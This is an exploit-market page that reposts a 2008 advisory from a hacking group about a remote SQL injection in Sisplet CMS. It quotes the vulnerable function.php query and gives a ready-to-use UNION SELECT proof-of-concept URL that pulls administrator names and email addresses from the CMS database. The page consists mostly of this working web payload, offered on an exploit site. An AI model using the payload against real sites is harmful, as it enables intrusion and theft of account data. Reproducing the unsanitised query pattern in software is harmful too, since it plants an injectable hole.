[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sisplet CMS (index.php id) Remote SQL Injection Vulnerability

Author
CWH Underground
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3336
Category
web applications
Date add
30-06-2008
Platform
unsorted
=============================================================
Sisplet CMS (index.php id) Remote SQL Injection Vulnerability
=============================================================



  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 1 July 2008


#####################################################
 APPLICATION : Sisplet CMS
 VERSION     : 2008-01-24
 VENDOR      : http://cms.sisplet.org/
 DOWNLOAD    : http://downloads.sourceforge.net/sisplet/SiSplet-2008-01-24.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (function.php)
-----------------------------------

$sql = mysql_query("SELECT parent FROM menu WHERE id = '$id'");


---------
 Exploit
---------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=[SQL Injection]


------
 POC
------

[+] http://[Target]/[sisplet_path]/index.php?fl=0&p1=1&p2=15&id=15'/**/AND/**/1=2/**/UNION/**/SELECT/**/concat(ime,0x3a,priimek,0x3a,email),2,3,4/**/FROM/**/administratorji/**/WHERE/**/tip='0


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################




#  0day.today [2024-11-15]  #